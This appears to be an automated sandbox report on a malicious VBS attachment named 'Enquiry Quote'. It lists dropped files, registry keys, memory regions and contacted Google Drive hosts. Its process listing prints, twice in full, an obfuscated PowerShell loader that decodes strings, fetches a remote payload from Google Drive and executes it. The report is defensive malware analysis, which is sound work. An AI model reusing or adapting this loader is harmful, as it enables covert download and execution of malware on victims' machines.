Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Enquiry Quote - 24071834-01.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mnjqzuy.bve.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dmb5p4uc.t0y.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezv0ptqm.sa1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlfoliuw.vdt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Woes.uds
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry Quote - 24071834-01.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes
Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae
Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens
Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes
Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If
(${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For(
$candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function
Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric
' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk
.erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric
'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm
=,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes
,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80
= Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale
(Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a
Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt
Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei
Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG
tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l
LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi
e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric
' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf
nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na
ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T
';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a=
(BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale
(Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale
(Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco=
P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$
NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf
+.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale
(Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg
SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A
[,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio
,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o
Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$
iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey
GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos
deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'stertors Styxian Hensigtserklringens Navler Forsmtes
Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes Setation Hernandiaceae
Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur stertors Styxian Hensigtserklringens
Navler Forsmtes Brnesaarenes Katte Adviseringerne Skidoo Endomysium Zymite Indskudsstningers Retarderet Prostates Afrejsendes
Setation Hernandiaceae Antefixa Down Linietegningens Modstningen Coarrangement Ressentimentsflelser Memoirelitteratur';If
(${host}.CurrentCulture) {$Saneringsplanernes++;}Function Isoelectric($Brnepsykologisk){$Bigamistens=$Brnepsykologisk.Length-$Saneringsplanernes;$Healthiest='SUBsTRI';$Healthiest+='ng';For(
$candystick=2;$candystick -lt $Bigamistens;$candystick+=3){$stertors+=$Brnepsykologisk.$Healthiest.Invoke( $candystick, $Saneringsplanernes);}$stertors;}function
Isoleringsmateriale($Portulakkernes){ . ($Chefkahyttens132) ($Portulakkernes);}$Koordinatfremstillingernes128=Isoelectric
' SMUno ,zLoiSll l a W/Op5 F.M 0Di Do( aW ,iSpn ,dPeoTrwR sPe ,rNMeTCl Fe1Su0l,.,o0Lu;.r bWReiManRe6no4 .;M .yxF.6Un4He;Sk
.erS.vHe: n1La2M 1fo.Le0O )fr FGFeeE,cA,k JoS /Ko2P 0 ,1P 0Fa0R.1So0.o1Su LeFEqiIar ieGyfouoCaxPo/Ha1 o2K,1 ,.,u0en ';$Veloce=Isoelectric
'C.U,osSte irEn-M AN,g e tnc tWi ';$Forsmtes=Isoelectric 'IshNetTot .pBisS :No/Mo/MadF rSoiSmvRee S. Bgv.o ao HgErlT ebl.KrcTrod.mHj/NouBecUn?udeFoxmapfroUnr.rtm
=,ud Co ,wU,nJ lFloLaaLidKn&.liGad,e=Un1S,D F8DinRek 3,tV eCyU TKSoaP W .BV,g.rwatlJeGNe5LarSelGaz Oj .mS.3Go5C,4OpPUdPDiMOpiVes
,RDeUV, ';$Lnslavers=Isoelectric ' r>Cu ';$Chefkahyttens132=Isoelectric 'AviBueMexBe ';$Ugerapporter5='Adviseringerne';$Pladret80
= Isoelectric ',ueTrcOvh JoBr Re%Eta ,pChpR dUna.rtOmafa%Ep\ eWdjo keDosFi. auIldOus R .i&Dr&,f ,deF.cSihtyoSt HutQu ';Isoleringsmateriale
(Isoelectric 'Do$FogUnl .oFubkaa slBu:StS eRelS vBeeburRekQue n rdeveEwlMos nes,r bsBl= P(LecOvmD,dre Te/Emc,a Od$NePD,lS,a
Dd .r eSpt,y8,n0Me),o ');Isoleringsmateriale (Isoelectric 'L.$BrglalAso IbF a .l.e: .NMiamivD lG,eO,rbu= a$JuFAfoSprKosPamIlt
Me ssPh.ThsStp tl riKut,m(Bu$ CLGunU sKalSkaS,vS,eMerZ.s a) . ');Isoleringsmateriale (Isoelectric 'Af[SgN,aeStt.a.A.SMbeI.rF,vTuiLacGeeD.PTeolei
Sn,utF.M raGen .aPog Lethr e]M.:.a:RaS te ,cFluDer Ki ,tPyy .P.lr Eo Rt .o ,cF o.kl S No=Mi En[ LNBeeA tI,. VSf eDec su CrIniG
tLoyRePCorU.o.atBroHec So.ilBrT .y .p LeCl]Un:Ve:S TA,lStsRo1 o2Ba ');$Forsmtes=$Navler[0];$Rehypnotize= (Isoelectric 'Fo$MagA,l
LoTjbBeaFjl,a: .SLayM l .lD o .gSpi ssSytMai AcD a ol,l=S.N ,e,hwUf-U OKobStjDreBrcSptUr CaS Ay,esAntO.e ,m O.flNM eBot,i.SoWi
e.rbDiC,llGaiFee nInt');$Rehypnotize+=$Selverkendelsers[1];Isoleringsmateriale ($Rehypnotize);Isoleringsmateriale (Isoelectric
' K$PrS ,yA.l,ulSpoUbgFoi,psg t,ai ,c ra .l S.,iHQue .aGgd .e.ur PsKe[.y$.nVfee.ml Mov,cbieN,]Sc=,o$XyKThoS oGkr.ad NiSen,oaTetfaf
nr Ee Um dsU t ,iTrlUslUdi DnCegTreUmr tnTie SsPe1Sa2Mi8 K ');$Slutafregning=Isoelectric 'Br$ SSa.y,alS lSuoGlg.tiTos Kt ,iKuc.na
ol ,.OmDN,oD,w ,n ,lMeo aa ,dSpF ,i .lF eor(Hu$MeF BoSkrf.ss m EtFoebusA.,Em$OvCD,o RaHer,krB.a UnK g oeN,m SeStn .tMa) T
';$Coarrangement=$Selverkendelsers[0];Isoleringsmateriale (Isoelectric 'In$U gK lmao HbSnaSpl.r:T OAcp.ibL,rDruHugBieNet a=
(BlT Ue isAltS -AgPSaaTat ChDi E $FaCKvoMea Nr r DaEknEtgBaeA mR,eLan.at S)Ne ');while (!$Opbruget) {Isoleringsmateriale
(Isoelectric 'P.$Sig.ulEmo Bbe,aT l F:FoB recag ,iI,nNon,aeUdrNo= ,$A.tBlrKyuOpe a ') ;Isoleringsmateriale $Slutafregning;Isoleringsmateriale
(Isoelectric 'seSpotDiaHer Nt ,-AsSU,lUde ,e lp n Ha4 H ');Isoleringsmateriale (Isoelectric ' B$Brg ClDoo,obSpaHel.n: cORep.ybS.rVauThgUneSntco=
P(,nT,oeFosT,tRi-R.PAfaRetAph T Ge$SmC,po.uaafrDorUna.snOvgRee emU.eThnOmtKu)Sk ') ;Isoleringsmateriale (Isoelectric 'G,$
NgSvlBloPibDoaKal.i:,nHByeFrnPesDii.lgFlt as Pe ArInk BlK.rA iV.nS gSgeFln,ls .=Pl$P gUnl GoT.bMoaOplT,:NoSAvtNoyUdx.oiFeaFonf
+.r+ Z%Ko$HyNDvaA,v,vl.iec r.y.VecDio.duFln Et n ') ;$Forsmtes=$Navler[$Hensigtserklringens];}$Tilvendelsens237=305549;$Urocentrummets=26395;Isoleringsmateriale
(Isoelectric 'Po$.hgPrlReo ,bEmaUpl.a:ArS k FiasdJooK.oHe Op=Bi TyGChe t V- CCFro.hnUnt.peCon TtKo T$PrC,joBeaFlr.orO aFen.rg
SeCam DeFonD tsp ');Isoleringsmateriale (Isoelectric 'Kl$Ang TlS,oPobB.aValSm:UnIArnCrvTrofilLevSle r De ,dRee.i I=po A
[,fS yBes rtMoeLomBe.I C RoB,nCov UeKor rtBa]Pi:c.: bFDarsto UmT.BB.abusG.eFi6Er4,aS .tEnr Bi nthg .(,e$AmSRekKhi dJaoFio
,),u ');Isoleringsmateriale (Isoelectric 'Ud$IlgmelCooUnb TaRelVi:K.IdynUndJusMakMou idVesFos.rtM.nHai NnLag SeDir.ssFe Pe=.o
Su[ BSZoyBas .tNyePrmAc.StTSieUdxVetOr..oEIsn.icMaoGedUniinnUdg .]Co:Ar:AnAMaSS,C ,I,mI S.A GDae.atDiSUntRerUni En WgSp(Fe$
iIHyn ,v,uo.tl uvSae ,rDieS dCoeK.) P ');Isoleringsmateriale (Isoelectric 'La$T,gDilHao MbG aPsl,i: GNdeeSumGuaRyt koafcMey
GsCet L= o$,eIScnPed FsHykdeu odAfs VsTet Kn IiSanOdgK e ,r asTa.O sseuRibKls ctSerPriDonKlgFl(Fu$CaT Li,alfrvRae InindCieSilFos
deLin .sBl2be3 M7C,,Sn$ayU FrM,oAacDue Sn Kt.ar muV m fm UeH tP,sYv) , ');Isoleringsmateriale $Nematocyst;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Woes.uds && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.goog
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://drive.google.com/uc?ex
|
unknown
|
||
|
https://drive.google.com/u
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://drive.google.
|
unknown
|
||
|
https://drive.go
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://drive.goo
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://drive.g
|
unknown
|
||
|
https://drive.google.com/uc
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://drive.google.com/
|
unknown
|
||
|
https://drive.googl
|
unknown
|
||
|
https://drive.google.com/uc?e
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.google.c
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
https://drive.google.com/uc?
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://drive.google
|
unknown
|
||
|
https://drive.google.co
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
216.58.206.46
|
||
|
drive.usercontent.google.com
|
172.217.16.193
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.16.193
|
drive.usercontent.google.com
|
United States
|
||
|
216.58.206.46
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5ECB000
|
trusted library allocation
|
page read and write
|
|
|
|
8B10000
|
direct allocation
|
page execute and read and write
|
|
|
|
9DB3000
|
direct allocation
|
page execute and read and write
|
|
|
|
1FADEC6A000
|
trusted library allocation
|
page read and write
|
|
|
|
1FAD0B22000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
4990000
|
trusted library allocation
|
page read and write
|
||
|
1FACD192000
|
heap
|
page read and write
|
||
|
19B1CC70000
|
heap
|
page read and write
|
||
|
2E70000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
317D000
|
stack
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
4980000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA36A000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA0EF000
|
heap
|
page read and write
|
||
|
49BA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAABF40000
|
trusted library allocation
|
page read and write
|
||
|
1FACF47D000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
435CBA3000
|
stack
|
page read and write
|
||
|
1FAE71D0000
|
heap
|
page read and write
|
||
|
1FACF46B000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E74000
|
heap
|
page read and write
|
||
|
435E04D000
|
stack
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBF8250000
|
remote allocation
|
page read and write
|
||
|
7FFAAC0E0000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
30DE000
|
stack
|
page read and write
|
||
|
1FAE7520000
|
heap
|
page read and write
|
||
|
435CEFE000
|
stack
|
page read and write
|
||
|
1BBFA071000
|
heap
|
page read and write
|
||
|
75B2000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA465000
|
heap
|
page read and write
|
||
|
1FACD240000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBF8148000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FAE72F6000
|
heap
|
page read and write
|
||
|
8AAE000
|
stack
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
358F000
|
unkown
|
page read and write
|
||
|
1BBF8278000
|
heap
|
page read and write
|
||
|
4AFC000
|
stack
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
76E0000
|
heap
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
6EC3D000
|
unkown
|
page read and write
|
||
|
1BBFA465000
|
heap
|
page read and write
|
||
|
1BBF81DC000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
7FFAABFF6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC250000
|
trusted library allocation
|
page read and write
|
||
|
1BBF81D0000
|
heap
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
435D07E000
|
stack
|
page read and write
|
||
|
7FFAAC130000
|
trusted library allocation
|
page execute and read and write
|
||
|
777F000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBF9FD2000
|
heap
|
page read and write
|
||
|
1FACD2E5000
|
heap
|
page read and write
|
||
|
1BBF9FE0000
|
heap
|
page read and write
|
||
|
1BBF8142000
|
heap
|
page read and write
|
||
|
1FAD0A78000
|
trusted library allocation
|
page read and write
|
||
|
1BBF81DA000
|
heap
|
page read and write
|
||
|
2BFD000
|
stack
|
page read and write
|
||
|
8B20000
|
direct allocation
|
page read and write
|
||
|
435D1F9000
|
stack
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
4A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB22802000
|
unkown
|
page readonly
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FAD04A8000
|
trusted library allocation
|
page read and write
|
||
|
1FACF189000
|
trusted library allocation
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
1FACD1D2000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
31DA000
|
heap
|
page read and write
|
||
|
6EC20000
|
unkown
|
page readonly
|
||
|
1BBF9FFC000
|
heap
|
page read and write
|
||
|
1BBF81A3000
|
heap
|
page read and write
|
||
|
87EE000
|
stack
|
page read and write
|
||
|
1BBFA00D000
|
heap
|
page read and write
|
||
|
1BBF81D0000
|
heap
|
page read and write
|
||
|
1BBF815C000
|
heap
|
page read and write
|
||
|
1BBFA346000
|
heap
|
page read and write
|
||
|
1FAD0A74000
|
trusted library allocation
|
page read and write
|
||
|
855E000
|
stack
|
page read and write
|
||
|
4A98000
|
heap
|
page read and write
|
||
|
49A9000
|
trusted library allocation
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9FE9000
|
heap
|
page read and write
|
||
|
1FACEBF0000
|
heap
|
page read and write
|
||
|
8895000
|
heap
|
page read and write
|
||
|
1FAD09E3000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA03D000
|
heap
|
page read and write
|
||
|
1FAE70D6000
|
heap
|
page read and write
|
||
|
1FACF0C4000
|
trusted library allocation
|
page read and write
|
||
|
1BBF81CC000
|
heap
|
page read and write
|
||
|
1FAD0A36000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
1FACF130000
|
trusted library allocation
|
page read and write
|
||
|
435CE7D000
|
stack
|
page read and write
|
||
|
307D000
|
stack
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
8B00000
|
trusted library allocation
|
page read and write
|
||
|
73A0000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
9210000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB227F6000
|
unkown
|
page readonly
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
716B000
|
stack
|
page read and write
|
||
|
4993000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAABF42000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1C5FFFF000
|
unkown
|
page read and write
|
||
|
1FAE7063000
|
heap
|
page read and write
|
||
|
1FADEC01000
|
trusted library allocation
|
page read and write
|
||
|
49C2000
|
trusted library allocation
|
page read and write
|
||
|
1BBF9E83000
|
heap
|
page read and write
|
||
|
1BBF9E8C000
|
heap
|
page read and write
|
||
|
1C600FF000
|
stack
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1FACD0A0000
|
heap
|
page read and write
|
||
|
1BBFA01C000
|
heap
|
page read and write
|
||
|
1BBF9F71000
|
heap
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
7FFAAC220000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
7FFAABF44000
|
trusted library allocation
|
page read and write
|
||
|
8B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
885F000
|
heap
|
page read and write
|
||
|
7FFAAC060000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1BBF9FBF000
|
heap
|
page read and write
|
||
|
1BBFA271000
|
heap
|
page read and write
|
||
|
1FACD140000
|
heap
|
page read and write
|
||
|
4B40000
|
trusted library allocation
|
page read and write
|
||
|
1BBFA05F000
|
heap
|
page read and write
|
||
|
19B1CC90000
|
heap
|
page read and write
|
||
|
49C0000
|
trusted library allocation
|
page read and write
|
||
|
